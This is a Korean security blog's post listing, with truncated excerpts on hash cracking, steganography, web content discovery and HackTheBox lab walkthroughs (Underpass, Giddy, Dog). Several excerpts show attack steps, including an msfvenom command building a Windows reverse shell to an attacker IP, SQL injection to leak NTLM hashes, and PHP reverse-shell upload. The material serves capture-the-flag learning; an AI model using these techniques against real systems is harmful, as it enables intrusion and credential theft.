해킹 16

[해킹 기법] 해시 크래킹 - 해시에서 비밀번호 복구하기

해시(Hash)해시(Hash)는 입력값을 받아서 일정한 크기의 출력값을 생성하는 암호화 기법이다. 해시는 일방향 암호화 기법이다. 이게 무슨 뜻이냐면 해시값을 역으로 계산해서 입력값을 얻는 것이 불가능하다는 뜻이다. 그렇기 때문에 데이터베이스에 비밀번호를 저장할 때 평문으로 저장하지 않고 비밀번호를 가지고 생성한 해시값을 대신 저장한다. 이렇게 해시값을 저장하면 데이터베이스가 해킹 당해서 정보가 유출되더라도 비밀번호가 아닌 비밀번호를 가지고 생성한 해시값이 유출되기 때문에 어느 정도 피해를 최소화 할 수 있다. 이론적으로 해시값을 역으로 계산해서 입력값인 비밀번호를 얻는 것은 불가능하다. 하지만 비밀번호를 해시화 했다고 해서 무조건 안전한 것은 아니다. MD5처럼 안전하지 않는 해시 알고리즘은 똑같은 해..

[모의 해킹] HackTheBox - Underpass Part 2

UnderpassOS: Linux취약점: 취약한 Sudo 권한 설정 Mosh는 SSH 같이 원격 접속 기능을 제공하는 서버다. Sudo 권한으로 Mosh 서버를 실행하고 Mosh 서버가 생성한 터미널에 접속해 루트쉘을 획득할 수 있다. SudosvcMosh@underpass:~$ sudo -lMatching Defaults entries for svcMosh on localhost: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_ptyUser svcMosh may run the following commands on localh..

모의 해킹/Linux 2025.04.06

[모의 해킹] HackTheBox - Underpass Part 1

UnderpassOS: Linux취약점: SNMP 기본 커뮤니티 스트링과 daloradius 기본 계정 정보 SNMP 프로토콜을 통해 웹서버에 대한 정보를 수집할 수 있다. 수집한 정보를 사용해 Daloradius 웹 매니지먼트 어플리케이션을 발견하고 Daloradius 기본 계정 비밀번호를 사용해 관리자 계정으로 로그인 할 수 있다. 관리자 계정에 접속해 Daloradius 회원 정보를 수집할 수 있고 해당 정보를 사용해 SSH로 타겟 머신에 접속할 수 있다. 포트 스캐닝nmap -Pn -sS -p- -oN ./SYN_SCAN 10.129.231.213PORT STATE SERVICE22/tcp open ssh80/tcp open httpnmap -Pn -sU -p- -oN ./UDP_SCAN ..

모의 해킹/Linux 2025.04.06

[해킹 기법] 스테가노그래피 - 파일 속에 데이터 숨기기

스테가노그래피 (Steganography)스테가노그래피 (Steganography)는 파일 안에 데이터를 삽입해서 은닉하는 기법이다. 스테가노그래피를 통해 사용자는 비디오, 오디오, 이미지 파일 등의 바이트를 조작해 원하는 데이터를 교묘하게 삽입할 수 있다. 데이터가 삽입된 비디오, 오디오, 이미지 파일들은 분명히 무언가 변하지만 그 정도가 너무나도 경미해 절대로 사람의 눈이나 귀로는 포착할 수 없다. 물론 대량의 데이터를 냅다 때려박는다면 포착 가능할 수도 있다 파일 크기가 5MB인 이미지 파일에 영문자 5,000자를 삽입한다고 생각해 보자.5MB = 1,048,576 bytes영문자 5,000자 = 5,000 bytes (ASCII 코드 기준) 5MB 이미지 파일에 영문자 5,000자를 삽입할 경우..

[모의 해킹] HackTheBox - Giddy Part 2

Giddy OS: Windows취약점: 취약한 서비스 권한 설정과 PowerShell 히스토리 파일 PowerShell 히스토리 파일에 기록된 정보를 기반으로 서비스를 조작해 악성 파일을 실행할 수 있다. 리버스쉘원할한 작업을 위해서 Evil-WinRM 세션에서 새로운 리버스쉘을 업로드 하자. msfvenom을 사용해서 윈도우용 TCP 기반 리버스쉘을 제작할 수 있다.┌─[✗]─[solo@parrot]─[~/Desktop/hack]└──╼ $msfvenom -p windows/powershell_reverse_tcp LHOST=10.10.14.108 LPORT=8000 -f exe -o reverse.exe*Evil-WinRM* PS C:\Users\Stacy\Documents> Invoke-WebReq..

[모의 해킹] HackTheBox - Giddy Part 1

GiddyOS: Windows취약점: SQL Injection, LLMNR Poisoning MS SQL Server를 데이터베이스로 사용하는 ASP.NET 기반 웹 어플리케이션이 돌아가는 머신이다. SQL Injection을 통해 MS SQL의 Stored Procedure인 xp_dirtree를 사용할 수 있다. xp_dirtree를 사용해 공격자에게 NTLM Hash를 전송하고 전송된 NTLM Hash를 크랙해 사용자 계정 비밀번호를 획득할 수 있다. 포트 스캐닝nmap -Pn -sS -p- -oN ./SYN_SCAN 10.10.10.104PORT     STATE SERVICE80/tcp   open  http443/tcp  open  https3389/tcp open  ms-wbt-server5..

[해킹툴] Feroxbuster - 고성능 웹 컨텐츠 탐색 툴

FeroxbusterFeroxbuster는 웹사이트 탐색에 사용할 수 있는 웹 컨텐츠 탐색 툴이다. Feroxbuster 말고도 Gobuster, Dirbuster, Dirb 등 아주 많은 웹 컨텐츠 탐색 툴을 검색하면 쉽게 찾을 수 있다. Feroxbuster는 다른 웹 컨텐츠 탐색 툴에 꿇리지 않을만큼 다양한 기능을 지원하고 무엇보다 체감상 속도가 다른 툴들보다 월등히 빨랐기 웹 컨텐츠 탐색 툴이 필요하다면 Feroxbuster를 추천한다. Feroxbuster를 사용하기 앞서 raft-medium-directories.txt 같이 웹 컨텐츠 탐색 wordlist를 준비하자. 탐색할 웹사이트 (http://bank.com) Feroxbuster를 사용해서 탐색을 진행할 웹사이트다. 물론 진짜 웹사이트..

해킹툴/웹 2025.03.17

[해킹 기법] 웹 컨텐츠 탐색 - 웹사이트 구조 파헤치기

웹해킹의 첫 단계웹해킹의 첫 단계는 무엇일까? 웹해킹을 하기 위해선 해킹하려는 웹사이트가 무슨 구조를 가지고 있고 어떻게 돌아가는지 파악해야 된다. 그리고 당연하게도 웹사이트 구조를 파악하기 위해선 웹사이트에 무슨 디렉토리와 파일이 존재하는지 확인해야 된다. 웹사이트의 디렉토리와 파일을 확인하는 해킹 기법, 그것이 바로 웹 컨탠츠 탐색 (Web Content Discovery)다. 웹 컨텐츠 탐색 (Web Content Discovery)웹 컨탠츠 탐색 (Web Content Discovery)은 웹사이트에 방대한 양의 디렉토리, 파일을 요청해서 받는 응답을 기반으로 웹사이트에 존재하는 디렉토리와 파일을 파악하는 해킹 기법이다. 이 과정에서 단순히 공개적으로 노출된 웹사이트의 디렉토리와 파일 뿐만이 아니..

해킹 기법/웹 2025.03.16

[모의 해킹] HackTheBox - Dog Part 2

DogOS: Linux취약점: 취약한 Sudo 설정 취약한 Sudo 권한으로 실행한 바이너리 파일이 리버스쉘을 생성하도록 유도해서 root 권한을 가진 쉘을 만들 수 있다. SSH┌─[✗]─[solo@parrot]─[~/Desktop/hack/note]└──╼ $ssh johncusack@10.10.11.58SSH로 johncusack 계정으로 로그인한다. SSH가 리버스쉘보다 안정적인 연결을 제공하기 때문에 작업하기 훨씬 수월하다. SSH로 성공적으로 로그인 했으면 사용자의 Sudo 권한을 확인해 보자. johncusack@dog:~$ sudo -l[sudo] password for johncusack: BackDropJ2024DS2024Matching Defaults entries for johncu..

모의 해킹/Linux 2025.03.15

[모의 해킹] HackTheBox - Dog Part 1

DogOS: Linux취약점: Arbitrary File Upload, Git Repository 노출 노출된 Git 리포지토리를 통해 Backdrop CMS 관리자 계정을 탈취할 수 있고, 해당 계정으로 PHP 리버스쉘을 업로드해서 접근할 수 있다. 포트 스캐닝nmap -Pn -sS -p- 10.10.11.58PORT   STATE SERVICE22/tcp open  ssh80/tcp open  httpnmap -Pn -sC -sV -p 22,80 10.10.11.58PORT   STATE SERVICE VERSION22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: |   3072..

모의 해킹/Linux 2025.03.15